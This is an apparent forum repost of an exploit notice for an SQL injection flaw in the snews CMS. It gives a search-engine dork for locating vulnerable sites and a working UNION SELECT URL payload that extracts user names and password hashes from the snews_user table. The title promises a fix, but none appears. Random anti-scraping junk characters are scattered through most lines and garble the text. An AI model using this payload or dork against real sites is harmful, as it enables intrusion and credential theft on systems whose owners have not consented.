中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
. e- }# p& G3 {* D3 o+ Z% J作者: By onestree
& Z6 r3 n- p5 B$ a9 ?* `下载地址 : http://snewscms.com/9 @6 d; I/ N  s' |- a- o9 I- }
测试平台 : ubuntu 12.10 / win 7) }0 H  N# N" m3 w0 M4 b, }
关键词: inurl:"tanyakan pada rumput yang bergoyang"
5 V' v* j: ^, v  @8 q; w: w3 d, t 2 V/ W3 @; S3 s5 c
4 p: Z. A( x3 \. P, a
*************************************************************
# A' J# }. a6 n' m+ R' l% a8 W& S- q9 Z1 T
: M9 D/ {8 Z: z7 S  y+ ESQL poc:
1 V! k; ^8 ^$ K9 G: h0 E7 P ) W, Z% d# L: J% V$ ^
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
- B# E$ B" ~( E2 s/ V3 t 4 l5 Q, r; g* A8 v  v) L
示例  u: x6 ~. p. K. S$ P' ?
' j" w  ~' L: a( n2 n7 _8 p8 D! Y
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*% L, Z& y+ t8 v

' n5 Z! a( Z7 o* p  q6 o
3 A3 z0 i/ {: q! _! i8 D: [5 Z2 d致谢:
, ~9 c  v/ i- d8 i9 y' U
# Y9 U$ j' R  Y9 k4 D  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
4 Z- z$ \5 |! o# R( l: s     ; ~5 ]' m! ^8 v2 z3 D. |" ?' v
          indonesiancoder - moeslimh4x0r - go-coder
$ K: @# D" E. o5 W2 [' f
" r* k% x1 z1 G( K9 ^spesial my hunny :*
- j* S9 ^$ }4 f& ]" ]  C



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2